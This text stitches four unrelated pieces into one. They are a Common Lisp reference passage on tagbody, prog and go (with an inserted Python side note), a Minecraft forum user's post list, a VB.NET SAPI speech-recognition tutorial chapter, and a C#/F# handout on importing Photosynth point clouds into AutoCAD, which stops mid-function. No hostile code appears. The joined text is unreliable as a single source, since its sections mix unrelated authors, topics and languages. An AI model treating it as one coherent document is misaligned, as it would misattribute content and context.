        "Can't eat without chopsticks."
        (snatch (chopstick j))
        (snatch (chopstick (mod (+ j 1) 5)))
        -
       eat
        (when (hungry)
          (mapc #'gobble-down '(twice-cooked-pork
                                kung-pao-chi-ding
                                wu-dip-har
                                orange-flavor-beef
                                two-side-yellow-noodles
                                twinkies))
          (go eat))
        -
        "Can't think with my neighbors' stomachs rumbling."
        (relinquish (chopstick j))
        (relinquish (chopstick (mod (+ j 1) 5)))
        -
        (if (happy)
            (go think)
            (become insurance-salesman))))

In certain implementations of Common Lisp they get away with it. Others abhor what they view as an abuse of unintended ambiguity in the language specification. For maximum portability, I advise users to steer clear of these issues.

Similarly, it is best to avoid using nil as a tag, even though it is a symbol, because a few implementations treat nil as a list to be executed. To be extra careful, avoid calling from within a tagbody a macro whose expansion might not be a non-nil list; wrap such a call in (progn ...), or rewrite the macro to return (progn ...) if possible.

[Macro]
prog ({var | (var [init])}*) {declaration}* {tag | statement}*
prog* ({var | (var [init])}*) {declaration}* {tag | statement}*

The prog construct is a synthesis of let, block, and tagbody, allowing bound variables and the use of return and go within a single construct. A typical prog construct looks like this:

    (prog (var1 var2 (var3 init3) var4 (var5 init5))
          {declaration}*
          statement1
     tag1
          statement2
          statement3
          statement4
     tag2
          statement5
          ...)

The list after the keyword prog is a set of specifications for binding var1, var2, etc., which are temporary variables bound locally to the prog. This list is processed exactly as the list in a let statement: first all the init forms are evaluated from left to right (where nil is used for any omitted init form), and then the variables are all bound in parallel to the respective results. Any declaration appearing in the prog is used as if appearing at the top of the let body.
The body of the prog is executed as if it were a tagbody construct; the go statement may be used to transfer control to a tag. A prog implicitly establishes a block named nil around the entire prog construct, so that return may be used at any time to exit from the prog construct.

Here is a fine example of what can be done with prog:

    (defun king-of-confusion (w)
      "Take a cons of two lists and make a list of conses.
       Think of this function as being like a zipper."
      (prog (x y z)
            (setq y (car w) z (cdr w))
       loop
            (cond ((null y) (return x))
                  ((null z) (go err)))
       rejoin
            (setq x (cons (cons (car y) (car z)) x))
            (setq y (cdr y) z (cdr z))
            (go loop)
       err
            (cerror "Will self-pair extraneous items"
                    "Mismatch - gleep!  ~S" y)
            (setq z y)
            (go rejoin)))

which is accomplished somewhat more perspicuously by

    (defun prince-of-clarity (w)
      "Take a cons of two lists and make a list of conses.
       Think of this function as being like a zipper."
      (do ((y (car w) (cdr y))
           (z (cdr w) (cdr z))
           (x '() (cons (cons (car y) (car z)) x)))
          ((null y) x)
        (when (null z)
          (cerror "Will self-pair extraneous items"
                  "Mismatch - gleep!  ~S" y)
          (setq z y))))

The prog construct may be explained in terms of the simpler constructs block, let, and tagbody as follows:

    (prog variable-list {declaration}* . body)
       == (block nil (let variable-list {declaration}* (tagbody . body)))

The prog* special form is almost the same as prog. The only difference is that the binding and initialization of the temporary variables is done sequentially, so that the init form for each one can use the values of previous ones. Therefore prog* is to prog as let* is to let. For example,

    (prog* ((y z) (x (car y)))
      (return x))

returns the car of the value of z.

I haven't seen prog used very much in the last several years. Apparently splitting it into functional constituents (let, block, tagbody) has been a success. Common Lisp programmers now tend to use whichever specific construct is appropriate.

[Special Form]
go tag

The (go tag) special form is used to do a ``go to'' within a tagbody construct. The tag must be a symbol or an integer; the tag is not evaluated. go transfers control to the point in the body labelled by a tag eql to the one given. If there is no such tag in the body, the bodies of lexically containing tagbody constructs (if any) are examined as well. It is an error if there is no matching tag lexically visible to the point of the go. The go form does not ever return a value.

As a matter of style, it is recommended that the user think twice before using a go. Most purposes of go can be accomplished with one of the iteration primitives, nested conditional forms, or return-from.
If the use of go seems to be unavoidable, perhaps the control structure implemented by go should be packaged as a macro definition.
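As a side note (not from the book): the tag-and-dispatch control discipline that tagbody and go provide can be emulated in languages without a go statement by an explicit dispatch loop. A minimal Python sketch, where each tag names a block of statements and a block "goes" to another tag by returning its name:

```python
# Emulate a tagbody: each tag maps to a callable block; "go" is modelled by
# returning the next tag, and falling off the end (returning None) plays the
# role of tagbody returning nil.
def run_tagbody(blocks, start):
    tag = start
    while tag is not None:
        tag = blocks[tag]()
    return None

trace = []

def top():
    trace.append("top")
    # (go done) once we have looped three times, else (go top)
    return "done" if len(trace) >= 3 else "top"

def done():
    trace.append("done")
    return None  # end of body

result = run_tagbody({"top": top, "done": done}, "top")
```

This sketch captures only the dispatch aspect; it does not model the lexical scoping of tags or the unwinding of catchers that a real Common Lisp go performs.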
http://sandbox.mc.edu/~bennet/cs231/cltl/clm/node91.html
I made a texture for this as a helmet and item, saved as attachments here:

NebulaeDragon - Registered Member - Member for 6 years, 8 months, and 2 days - Last active Wed, Oct 18 2017 13:47:47 - 0 Followers - 5 Total Posts - 0 Thanks

Feb 27, 2016 - NebulaeDragon posted a message on [Request] Can someone create a mask for me? Or a good texture
Posted in: Requests / Ideas For Mods

NebulaeDragon posted a message on Mod Idea: Mobs have higher health and damage the further from spawn they are
Posted in: Requests / Ideas For Mods

If you've used many mods or modpacks that add more equipment or more ways to become more powerful, you may have found that mobs eventually become so weak compared to you that it would be practically impossible for them to ever kill you. At this point, only mobs or bosses added by mods could be a challenge, but after killing them you will almost always get better equipment from them that makes them much easier. You could try installing some more mods that make mobs more powerful, but that usually just makes the beginning of the game much harder while making the endgame only slightly more difficult. The problem is that, while you progress, mob difficulty is constantly lowering relative to you, and the only time it goes up is in other dimensions (and with mods those dimensions usually give you even more ways to become powerful).

My idea for a solution to this problem is a mod that makes enemies spawn with more health and damage the further from spawn they are. This would let the start of the game not be too difficult unless you wanted to go further from spawn and fight more powerful mobs, and when you get much better equipment you can just go really far from spawn so combat stays challenging. I have searched for a mod that does this, but the only things like this I could find were some Bukkit plugins from 2 or 3 years ago, and apparently you can't download Bukkit anymore.
So would anyone want to make a mod that causes mobs to have their maxHealth and attackDamage multiplied based on how many blocks away from spawn they spawned?

EDIT: I found a mod that does this!

NebulaeDragon posted a message on A mod that lets you keep your inventory on death, but still lose exp
Posted in: Requests / Ideas For Mods

I usually have keepInventory set to true because I don't like losing all my items when I die, but then there isn't really a reason to avoid dying other than not having to travel all the way back to where you died. This gave me the idea to install the More Health Enchanted mod, and change the config so I start with 5 hearts and go back to 5 hearts when I die, and have to level up to get 10 hearts again. However, because keepInventory is on, I would respawn with all the exp I had, and when my level would update I'd instantly be back at 10 hearts. I think there's a mod that already allows something like this, but it includes a lot of other things and causes my game to crash.

NebulaeDragon posted a message on How to set a resource pack to a server
Posted in: Resource Pack Help

But how do you find a source link with .zip at the end?

NebulaeDragon posted a message on 1.12 - Custom Loot Tables
Posted in: Commands, Command Blocks and Functions

What do you mean by namespace? If I named a folder "Loot" and in that folder I had a folder named "chests" that contained the .json file for a custom loot table called "dogfood", I think I'd have to use a command like this:

    /blockdata ~ ~-1 ~ {LootTable:"Loot:chests/dogfood"}

to set that as the loot table for a chest, but I don't know where to put the folder named "Loot".
https://www.minecraftforum.net/members/NebulaeDragon/posts
In the previous chapter, we built our second application with Microsoft Agent. The application took advantage of speech recognition technologies available as an engine for the Agent characters. In this chapter, we continue on a similar path, but this time, we use the Microsoft Speech SDK.

When the Microsoft Research Speech Technology Group released the SAPI 5.0 SDK, it contained one big omission: a COM interface for VB programmers. By the time version 5.1 was released, they had fixed this shortcoming. It's important not to confuse the SAPI 5.1 SDK with the .NET Speech SDK. The .NET Speech SDK should only be used for Web-based applications (Web Forms), whereas the SAPI SDK is intended for Windows Forms applications.

The SAPI speech recognition engine differs greatly from the Agent offering. For starters, the engine is advanced enough to allow you to dictate directly into an application. You could dictate letters or memos without the need to make many corrections afterwards. The engine even works very well without extensive training. You can download the Speech SDK from Microsoft's Web site; remember that we need to use the version 5.1 Speech SDK in lieu of the .NET Speech SDK because it is for Windows-based applications rather than the Web-centric .NET version.

Like Agent, the SAPI speech recognition engine is also very easy to use. We can begin the application by creating a new Windows Forms application. The next step is to add a reference to the Microsoft Speech Object Library. You can add the library using the Project menu, selecting Add Reference, clicking on the COM tab, and then choosing the library from the list.

The user interface for our application will be very simple and will consist of four buttons, a status bar, and a text box. You can use the properties listed in Table 21.1 and refer to Figure 21.1 for the arrangement of the controls.

Figure 21.1: The completed GUI for our application.
With the brief overview and GUI out of the way, we can write some code for our application. We begin the code with the Imports statements for SpeechLib and System.Threading:

    Imports SpeechLib
    Imports System.Threading

The SpeechLib reference was added earlier in the project and probably comes as no surprise. The System.Threading namespace is something that we have yet to touch on. In simple terms, threading is the ability to run different pieces of code (methods) at the same time. You can even think of it as multitasking within a single application. Although that sounds good, a computer can't truly do multiple things at the same time, so in order for threading to work, different tasks and threads have to share processing resources. It is the job of the operating system to assign time to the different tasks.

As a real-world example, take a look at Microsoft Internet Explorer. As you navigate a Web site, items are being downloaded. As busy as the application is retrieving information, you can still perform other tasks, such as move the window around, resize it, and even open another window. This is because all of the tasks are running on different threads.

We don't have much of a need for threads in this application. Really, we only need to use a constant called Timeout.Infinite, which is used to specify an infinite waiting period. We use the constant in this application when we save the text-to-speech output of our application to a WAV file.

Our next step is to Dim some variables that we'll need to use throughout the application. These variables include RecoContext, Grammar, m_bRecoRunning, and m_cChars.

    Dim WithEvents RecoContext As SpeechLib.SpSharedRecoContext
    Dim Grammar As SpeechLib.ISpeechRecoGrammar
    Dim m_bRecoRunning As Boolean
    Dim m_cChars As Short

We use the Form_Load event to initialize some of the controls and variables. First, we set txtSpeech (or a replacement Ink control) to an empty string value.
This effectively removes any text it currently has, so that anything we dictate into the application is visible by itself. Next, we set the state of the recognition to False. We'll actually create a Sub routine for this, but for now, you can simply type the line that calls the routine. Additionally, we set m_cChars equal to 0 and the Text property of StatusBar1 equal to an empty string. Here is the code:

    txtSpeech.Text = ""
    SetState(False)
    m_cChars = 0
    StatusBar1.Text = ""

The next step is to create the SetState Sub routine. This Sub allows us to turn the recognition on and off quickly and effectively throughout the use of the application. We'll begin by passing a Boolean value into the Sub, because the True and False values are an easy way to set the current state of the recognition. If you pass a True value, recognition is working, whereas False obviously turns it off. The value being passed in will be known as bNewState by the Sub. We can use bNewState directly to set the m_bRecoRunning variable. After setting the value, we can set the Enabled property of btnRecognize equal to the opposite of m_bRecoRunning. Therefore, if the engine is running, the button is not enabled, and if the engine is not running, the button is enabled. The last step in the Sub is to use m_bRecoRunning to set the Enabled property of btnStopRecognize. This time, however, we can use the actual value, as we only want btnStopRecognize enabled when the engine is running, and we certainly don't have a need to click on it when it is not running. Here is the entire procedure:

    Private Sub SetState(ByVal bNewState As Boolean)
        m_bRecoRunning = bNewState
        btnRecognize.Enabled = Not m_bRecoRunning
        btnStopRecognize.Enabled = m_bRecoRunning
    End Sub

Let's now look at the events that are triggered when each of the four buttons is clicked, as well as the RecoContext event, which occurs when m_bRecoRunning is enabled and some speech is recognized. We'll start with the btnRecognize_Click event.
The btnRecognize_Click event begins by initializing the Recognition Context object and the Grammar object. We will then use the SetState Sub procedure, and by passing a value of True, we set the state of the recognition to True. Lastly, we set the Text property of StatusBar1 to "SAPI ready for dictation...".

    Private Sub btnRecognize_Click(ByVal sender As System.Object, _
            ByVal e As System.EventArgs) Handles btnRecognize.Click
        If (RecoContext Is Nothing) Then
            StatusBar1.Text = "Initializing SAPI reco..."
            RecoContext = New SpeechLib.SpSharedRecoContext()
            Grammar = RecoContext.CreateGrammar(1)
            Grammar.DictationLoad()
        End If
        Grammar.DictationSetState(SpeechLib.SpeechRuleState.SGDSActive)
        SetState(True)
        StatusBar1.Text = "SAPI ready for dictation..."
    End Sub

This is the first time in our application that the state of the recognition has been set to True, so it seems like an appropriate time to look at the RecoContext Recognition method. You can create this procedure by using the Class Name and Method Name drop-down lists and choosing RecoContext and Recognition, respectively. We begin by setting the StatusBar1 Text property to "Recognizing...". This gives an update to our user that something is actually occurring in our application. If you did not update the user on the status, it might appear to them that the application was not working correctly. Most of the remaining portion of code for this procedure is used to add the recognized text to the text box. When we append the text to the text box, we add a space so that the sentences do not run together. Once finished, we set the StatusBar1 Text property to "Speech recognized successfully...SAPI enabled" so the user knows he can continue dictation if he wants.
Here is the code:

Private Sub RecoContext_Recognition(ByVal StreamNumber As Integer, _
        ByVal StreamPosition As Object, _
        ByVal RecognitionType As SpeechLib.SpeechRecognitionType, _
        ByVal Result As SpeechLib.ISpeechRecoResult) _
        Handles RecoContext.Recognition
    Dim strText As String
    strText = Result.PhraseInfo.GetText
    StatusBar1.Text = "Recognizing..."
    txtSpeech.SelectionStart = m_cChars
    txtSpeech.SelectedText = strText & " "
    m_cChars = m_cChars + 1 + Len(strText)
    StatusBar1.Text = "Speech recognized successfully...SAPI enabled"
End Sub

Now that we are dictating into the application, we also need a way to turn the dictation process off. This job is taken care of by btnStopRecognize. When we click the button, we want to set the grammar state to inactive, use SetState to set the recognition to False, and then update StatusBar1 to reflect these changes. Here is the code:

Private Sub btnStopRecognize_Click(ByVal sender As System.Object, _
        ByVal e As System.EventArgs) Handles btnStopRecognize.Click
    Grammar.DictationSetState(SpeechLib.SpeechRuleState.SGDSInactive)
    SetState(False)
    StatusBar1.Text = "SAPI Disabled"
End Sub

Dictation into the application is now taken care of completely, although we have a few additional features we want to add to our application. In addition to speech recognition, SAPI allows us to perform Text to Speech similarly to Microsoft Agent. We have two remaining buttons on our form, and their click events allow us to read back the text audibly, or, if we choose, we can save the content of the text box to a WAV file so that it can be played later. Let's handle btnSpeak first because it is the less complicated of the two and covers part of what occurs in btnSpeakToFile. We begin by creating a variable called Voice and setting it to a new SpVoice object. We can then use the Speak method of Voice to convert the text contents of the txtSpeech text box to speech. Lastly, we update StatusBar1 to "SAPI disabled...".
Here is the code:

Private Sub btnSpeak_Click(ByVal sender As System.Object, _
        ByVal e As System.EventArgs) Handles btnSpeak.Click
    Dim Voice As SpVoice
    Voice = New SpVoice()
    Voice.Speak(txtSpeech.Text, _
        SpeechLib.SpeechVoiceSpeakFlags.SVSFlagsAsync)
    StatusBar1.Text = "SAPI disabled..."
End Sub

Like btnSpeak, btnSpeakToFile begins with initializing the Voice variable. Next, we set the Text property of StatusBar1 to "Saving to file...". We then proceed to create a new SaveFileDialog and create a filter for saving the contents as a WAV file. Once we have a filename, we then Dim SpFileMode and SpFileStream so that we know how to save the file. We then use the Speak method of Voice, but instead of audibly hearing the speech, it is saved into the WAV file we create. Lastly, we close the stream and then set the StatusBar1 Text property to "SAPI disabled...". Here is the code:

Private Sub btnSpeakToFile_Click(ByVal sender As System.Object, _
        ByVal e As System.EventArgs) Handles btnSpeakToFile.Click
    Dim Voice As SpVoice
    Voice = New SpVoice()
    StatusBar1.Text = "Saving to file..."
    Dim sfd As SaveFileDialog = New SaveFileDialog()
    sfd.Filter = "All files (*.*)|*.*|wav files (*.wav)|*.wav"
    sfd.Title = "Save to a wave file"
    sfd.FilterIndex = 2
    sfd.RestoreDirectory = True
    If sfd.ShowDialog() = DialogResult.OK Then
        Dim SpFileMode As SpeechStreamFileMode = _
            SpeechStreamFileMode.SSFMCreateForWrite
        Dim SpFileStream As SpFileStream = New SpFileStream()
        SpFileStream.Open(sfd.FileName, SpFileMode, False)
        Voice.AudioOutputStream = SpFileStream
        Voice.Speak(txtSpeech.Text, _
            SpeechLib.SpeechVoiceSpeakFlags.SVSFlagsAsync)
        Voice.WaitUntilDone(Timeout.Infinite)
        SpFileStream.Close()
    End If
    StatusBar1.Text = "SAPI Disabled..."
End Sub

You are now in a position to test the application after you save it. When you start it, the screen should look like Figure 21.2.

Figure 21.2: Your application should look similar to this on startup.

You can now try the various buttons to see how each of them performs.
When you test the Speak to File button, you can test the resulting WAV file by double-clicking it. The application that has been set to open WAV files (by default, this is Media Player) opens and plays the file, as shown in Figure 21.3.

Figure 21.3: The file being played back in Media Player.

In this chapter, we built the first of two programs based on the SAPI 5.1 Speech SDK. We used the built-in grammar as we tested the speech recognition capabilities. Although it is certainly very good, there are certain types of applications that can benefit from more precise recognition. This brings us to Chapter 22, Custom Grammars for Speech Recognition, in which we build an application that performs basic arithmetic. The numbers and operations are all handled by speech recognition using a custom grammar.
https://flylib.com/books/en/2.187.1/speech_input_with_sapi.html
This handout is for the companion class to the one whose handout formed my last post. While that class was user-focused, this one, “CP322-2 - Integrate F# into Your C# or VB.NET Application for an 8x Performance Boost”, is more developer-focused and takes the hood off the implementation of the BrowsePhotosynth application. The code for this special version of the application – which imports synchronously via C# and synchronously/asynchronously via F# – is available here for download. Introduction This class takes a look at the implementation of BrowsePhotosynth for AutoCAD, the ADN Plugin of the Month from October 2010 and the application showcased in the companion, user-oriented class, “AC427-4 - Point Clouds on a Shoestring”. We’ll look at some of the design decisions behind the application, particularly with respect to the use of F# to help download and process the various files making up a Photosynth’s point cloud. To understand more about the purpose of this application, it’s first worth taking a look at the handout to the companion class. In a nutshell, the BrowsePhotosynth application allows users of AutoCAD 2011 (and, in due course, above) to browse the contents of the Photosynth web-service and easily bring down point clouds corresponding to the “synths” hosted on the site. The System Architecture Let’s take a look at the overall architecture of the system before diving into the individual components. Here we can see a few DLLs are hosted by AutoCAD: the primary one is called ADNPlugin-BrowsePhotosynth.dll and implements a number of commands, the most important of which are BROWSEPS and IMPORTPS. It is this DLL that needs to be NETLOADed or demand-loaded into AutoCAD for the BrowsePhotosynth application to work properly. Users will call BROWSEPS, which causes the UI component - ADNPlugin-PhotosynthBrowser.exe – to be launched to present a dialog user to the user. 
This dialog will – in turn – call the IMPORTPS command back in AutoCAD to download, process and import the point cloud data. It's during this processing phase that the main Importer may choose to use a separate component, the Processor DLL (ADNPlugin-PhotosynthProcessor.dll). This functionality has been packaged as a separate component as it was written in F#.

The User Interface

As mentioned above, the main entry-point into the application is the BROWSEPS command, which launches a WPF dialog implemented in the "Browser" project of the main solution. This project actually builds an EXE (ADNPlugin-PhotosynthBrowser.exe), rather than a DLL, which is interesting for a few reasons:

- Isolation from AutoCAD
- Portability to other products - As we support point clouds across more of our products, having an independent GUI component will simplify migration to support them
- Can even be used standalone - As the browser does not depend on AutoCAD, it can also be executed separately, allowing the user to build up the list of point clouds to import before even launching AutoCAD

The overriding reason for this design was the first: the ability to run as 32-bit even on 64-bit OSs was important, as we make use of a 3rd party component, csExWb2, which is currently only available as a 32-bit version. This component also causes an error when the hosting dialog closes (which you will see if you launch the EXE separately, as described in the third point above). It's also for this reason – to isolate the user from this error, which caused AutoCAD stability problems when it happened in an in-process component – that the dialog is hosted in a separate application. The main plugin launches and maintains an instance of the dialog's process: when the dialog is closed it is effectively hidden, and the process gets terminated at an appropriate point later on, thus avoiding the error.
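The launch-and-own relationship between the plugin and the dialog process can be sketched in a few lines. Here's a rough Python illustration (my own, not the plugin's C# code) where a sleeping child process stands in for the external browser EXE; the parent keeps the handle so it can terminate the child at a convenient moment later:

```python
import subprocess
import sys

# Launch a child process (stand-in for ADNPlugin-PhotosynthBrowser.exe)
# and keep the handle so the owner can terminate it later.
child = subprocess.Popen(
    [sys.executable, "-c", "import time; time.sleep(60)"])

# While the "dialog" is alive, poll() reports None.
assert child.poll() is None

# At a suitable point the owning process shuts the child down,
# avoiding a stray process being left behind.
child.terminate()
child.wait(timeout=10)
assert child.poll() is not None
```

The same handle could also be used at startup to detect and clean up a stray process left over from an earlier crash.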
If AutoCAD gets terminated unexpectedly (such as via the debugger), there may be a stray process, which is detected and terminated (should the user request it) when the application is next used.

So why use a 3rd party component, if it causes all these problems? The component implements a web-browser control that reports the HTTP traffic generated by its contents to the application. This allows us to detect when the user has visited a page containing a synth, as the embedded Silverlight control requests a file named "points_0_0.bin", the file containing the point cloud's first 5,000 points. There may be other browser controls available that implement this capability, but I unfortunately haven't found any.

As the application detects point clouds being accessed, they get added to the list on the right of the dialog using an image that is also pulled down from the Photosynth server.

The original UI was implemented using WinForms, but the benefits of using WPF quickly became apparent as additional UI features – such as the ability to resize the items using a slider – became desirable. It's worth taking a look at some of the techniques used in the WPF application – here are some of them:

- Our list of point clouds is bound to an ObservableCollection<> of objects containing the information we care about - We had to implement INotifyPropertyChanged for this to work properly
- We add items to this list when our HTTP event is fired, but as we're not executing on the UI thread at that point, we need to request the list to be updated via Dispatcher.Invoke()
- We use a WindowInteropHelper to make AutoCAD's main window the parent of the EXE - This gives a modal – rather than modeless – feel to the UI
- The display of our listbox has been customized significantly - It selects on hover - It has a custom gradient fill to better fit the look & feel of the Photosynth site

For additional information regarding the development of the WPF UI for this application, see this blog post.
Now on to how the UI communicates with AutoCAD. To avoid any dependency on AutoCAD from the WPF application, it simply uses Windows messages to launch the IMPORTPS command. This decoupling is healthy for portability reasons, but also makes sure the command gets launched cleanly: it is considered best practice to launch commands in AutoCAD from a modeless UI, whether using AutoCAD's SendStringToExecute() API or using Win32's SendMessage().

The Import Process

The IMPORTPS command – which is actually the real heart of the application – has the following process:

It's worth noting that the application doesn't actually make much use of AutoCAD's APIs: it uses SendStringToExecute() to fire off standard commands to index and attach the point cloud, but aside from that the plugin's code is also fairly standalone in nature. We're most interested in the left-hand part of this process, where we bring the .bin files down from the Photosynth server and process them into a single text file.

Let's start by understanding why there are all these files to download, process and combine. Photosynth's web service stores point clouds in chunks of 5,000 points. So if we have a point cloud comprising 26,000 points, it will be stored in 6 files named points_0_0.bin, points_0_1.bin, points_0_2.bin, points_0_3.bin, points_0_4.bin and points_0_5.bin, each containing 5,000 points, apart from the last, which will only contain 1,000. This has most probably been done to enable the Silverlight control to stream down sections of the point cloud selectively/progressively. There may be additional point clouds (contained in files such as points_2_0.bin, etc.), but as these do not share a coordinate system with the primary point cloud, including them only proves confusing. These could easily be downloaded and combined into separate PCG files inside AutoCAD, but this has been left as an exercise for the user, as the merit of doing so seems somewhat dubious.

Now onto the main purpose of this class.
:-)

Given the unordered nature of point clouds – at least from AutoCAD's perspective – this presents us with a really interesting optimization opportunity: rather than downloading and processing the files sequentially via synchronous API calls, we can choose to perform this work asynchronously. Asynchronous programming is a hot topic right now, and currently a key benefit F# brings over VB.NET and C# – hence the somewhat provocative title for this class. That said, Anders Hejlsberg's recent announcement at PDC 2010 regarding the addition of asynchronous programming support to VB.NET and C# – which can be used right now with the Visual Studio Async CTP – will definitely enable this kind of functionality from your preferred .NET language, over time. Also worth checking out is the accompanying Channel 9 interview. Anders' demo shows very eloquently why the current mode of making asynchronous calls from VB.NET and C# is inadequate. While the Parallel Extensions for .NET – provided in .NET 4.0 – were a great addition for simplifying the management of multiple tasks, strong support for asynchronous calls was missing. This area is still a key advantage of using F#: its elegant Asynchronous Workflows feature makes the description and execution of asynchronous tasks really easy.
Before we look at applying Asynchronous Workflows to this problem, let's see a standard synchronous approach in C#:

using Autodesk.AutoCAD.DatabaseServices;
using Autodesk.AutoCAD.EditorInput;
using Autodesk.AutoCAD.Runtime;
using System.Net;
using System.IO;
using System;

namespace PhotosynthProcSyncCs
{
  public class PointCloudProcessor
  {
    Editor _ed;
    ProgressMeter _pm;
    string _localPath;

    public PointCloudProcessor(
      Editor ed, ProgressMeter pm, string localPath
    )
    {
      _ed = ed;
      _pm = pm;
      _localPath = localPath;
    }

    public long ProcessPointCloud(
      string path, int[] dims, string txtPath
    )
    {
      // Counter for the total number of points
      long totalPoints = 0;

      // Create our intermediate text file in the temp folder
      FileInfo t = new FileInfo(txtPath);
      StreamWriter sw = t.CreateText();
      using (sw)
      {
        // We'll use a web client to download each .bin file
        WebClient wc = new WebClient();
        using (wc)
        {
          for (int maj = 0; maj < dims.Length; maj++)
          {
            for (int min = 0; min < dims[maj]; min++)
            {
              // Loop for each .bin file
              string root =
                maj.ToString() + "_" + min.ToString() + ".bin";
              string src = path + root;
              string loc = _localPath + root;
              try
              {
                wc.DownloadFile(src, loc);
              }
              catch
              {
                return 0;
              }
              if (File.Exists(loc))
              {
                // Open our binary file for reading
                BinaryReader br = new BinaryReader(
                  File.Open(loc, FileMode.Open)
                );
                using (br)
                {
                  try
                  {
                    // First information is the file version
                    // (for now we support version 1.0 only)
                    ushort majVer = ReadBigEndianShort(br);
                    ushort minVer = ReadBigEndianShort(br);
                    if (majVer != 1 || minVer != 0)
                    {
                      _ed.WriteMessage(
                        "\nCannot read a Photosynth point cloud " +
                        "of this version ({0}.{1}).",
                        majVer, minVer
                      );
                      return 0;
                    }

                    // Clear some header bytes we don't care about
                    int n = ReadCompressedInt(br);
                    for (int i = 0; i < n; i++)
                    {
                      int m = ReadCompressedInt(br);
                      for (int j = 0; j < m; j++)
                      {
                        ReadCompressedInt(br);
                        ReadCompressedInt(br);
                      }
                    }

                    // Find out the number of points in the file
                    int numPoints = ReadCompressedInt(br);
                    totalPoints += numPoints;
                    _ed.WriteMessage(
                      "\nProcessed points_{0} containing {1} points.",
                      root, numPoints
                    );

                    for (int k = 0; k < numPoints; k++)
                    {
                      // Read our coordinates
                      float x = ReadBigEndianFloat(br);
                      float y = ReadBigEndianFloat(br);
                      float z = ReadBigEndianFloat(br);

                      // Read and extract our RGB values
                      UInt16 rgb = ReadBigEndianShort(br);
                      int r = (rgb >> 11) * 255 / 31;
                      int g = ((rgb >> 5) & 63) * 255 / 63;
                      int b = (rgb & 31) * 255 / 31;

                      // Write the point with its color to file
                      sw.WriteLine(
                        "{0},{1},{2},{3},{4},{5}",
                        x, y, z, r, g, b
                      );
                    }
                  }
                  catch (System.Exception ex)
                  {
                    _ed.WriteMessage(
                      "\nError processing point cloud file " +
                      "\"points_{0}\": {1}",
                      root, ex.Message
                    );
                  }
                }

                // Delete our local .bin file
                File.Delete(loc);

                // Show some progress
                _pm.MeterProgress();
                System.Windows.Forms.Application.DoEvents();
              }
            }
          }
        }
      }
      return totalPoints;
    }

    private static int ReadCompressedInt(BinaryReader br)
    {
      int i = 0;
      byte b;
      do
      {
        b = br.ReadByte();
        i = (i << 7) | (b & 127);
      } while (b < 128);
      return i;
    }

    private static float ReadBigEndianFloat(BinaryReader br)
    {
      byte[] b = br.ReadBytes(4);
      return BitConverter.ToSingle(
        new byte[] { b[3], b[2], b[1], b[0] }, 0
      );
    }

    private static UInt16 ReadBigEndianShort(BinaryReader br)
    {
      byte b1 = br.ReadByte();
      byte b2 = br.ReadByte();
      return (ushort)(b2 | (b1 << 8));
    }
  }
}

The important thing to note about the signature of the ProcessPointCloud() function – which I've kept the same across the C# and F# implementations – is the way the dims variable works: this is a simple array – populated by querying the Photosynth web service – of the number of files to download for the various point clouds in the synth.
For example: if a synth contains three point clouds, the first comprising 5 files, the second of 3 files and the third of 1 file, { 5, 3, 1 } would get passed into the function, which would then attempt to download the following files: points_0_0.bin, points_0_1.bin, points_0_2.bin, points_0_3.bin, points_0_4.bin, points_1_0.bin, points_1_1.bin, points_1_2.bin and points_2_0.bin. As mentioned earlier, I've recently changed the approach to only download the first point cloud for each synth, so only the points_0_x.bin files will be downloaded and processed. Which means dims will now always only have one entry.

The above code works in a very linear fashion: download a file, process it, download the next, process that, etc. Now let's take a look at the equivalent Asynchronous Workflows implementation in F#:

module PhotosynthProcAsyncFs

open System.Globalization
open System.Threading
open System.Text
open System.Net
open System.IO
open System

// We need the SynchronizationContext of the UI thread,
// to allow us to make sure our UI update events get
// processed correctly in the calling application

let mutable syncContext : SynchronizationContext = null

// Asynchronous Worker courtesy of Don Syme:
// parallel-design-patterns-in-f-reporting-progress-with-
// events-plus-twitter-sample.aspx

type Agent<'T> = MailboxProcessor<'T>

type SynchronizationContext with
  // A standard helper extension method to raise an event on
  // the GUI thread
  member syncContext.RaiseEvent (event: Event<_>) args =
    syncContext.Post((fun _ -> event.Trigger args), state=null)

type AsyncWorker<'T>(jobs: seq<Async<'T>>) =

  // Each of these lines declares an F# event that we can raise
  let allCompleted = new Event<'T[]>()
  let error = new Event<System.Exception>()
  let canceled = new Event<System.OperationCanceledException>()
  let jobCompleted = new Event<int * 'T>()

  let cancellationCapability = new CancellationTokenSource()

  // Start an instance of the work
  member x.Start() =

    // Capture the synchronization context to allow us to raise
    // events back on the GUI thread
    if syncContext = null then
      syncContext <- SynchronizationContext.Current
    if syncContext = null then
      raise(
        System.NullReferenceException(
          "Synchronization context is null."))

    // Mark up the jobs with numbers
    let jobs = jobs |> Seq.mapi (fun i job -> (job, i+1))

    let work =
      Async.Parallel
        [ for (job, jobNumber) in jobs ->
            async {
              let! result = job
              syncContext.RaiseEvent jobCompleted (jobNumber, result)
              return result
            } ]

    Async.StartWithContinuations(
      work,
      (fun res -> syncContext.RaiseEvent allCompleted res),
      (fun exn -> syncContext.RaiseEvent error exn),
      (fun exn -> syncContext.RaiseEvent canceled exn))

  // Publish the worker's events and expose cancellation
  member x.JobCompleted = jobCompleted.Publish
  member x.AllCompleted = allCompleted.Publish
  member x.Canceled = canceled.Publish
  member x.Error = error.Publish
  member x.CancelAsync() = cancellationCapability.Cancel()

type PointCloudProcessor() =

  // Mutable state to track progress and results
  let mutable jobsComplete = 0
  let mutable jobsFailed = 0
  let mutable totalJobs = 0
  let mutable totalPoints = 0
  let mutable completed = false

  // Event to allow caller to update the UI
  let jobCompleted = new Event<string * int>()

  // Function to access a stream asynchronously
  let httpAsync (url:string) =
    async {
      let req = WebRequest.Create(url)
      let! rsp = req.AsyncGetResponse()
      return rsp.GetResponseStream()
    }

  // Functions to read data from our point stream
  let rec readCompressedInt (i:int) (br:BinaryReader) =
    let b = br.ReadByte()
    let i = (i <<< 7) ||| ((int)b &&& 127)
    if (int)b < 128 then
      readCompressedInt i br
    else
      i

  let readBigEndianFloat (br:BinaryReader) =
    let b = br.ReadBytes(4)
    BitConverter.ToSingle(
      [| b.[3]; b.[2]; b.[1]; b.[0] |], 0)

  let readBigEndianShort (br:BinaryReader) =
    let b1 = br.ReadByte()
    let b2 = br.ReadByte()
    ((uint16)b2 ||| ((uint16)b1 <<< 8))

  // Recursive function to read n points from our stream
  // (We use an accumulator variable to enable tail-call
  // optimization)
  let rec readPoints acc n br =
    if n <= 0 then
      acc
    else
      // Read our coordinates
      let x = readBigEndianFloat br
      let y = readBigEndianFloat br
      let z = readBigEndianFloat br

      // Read and extract our RGB values
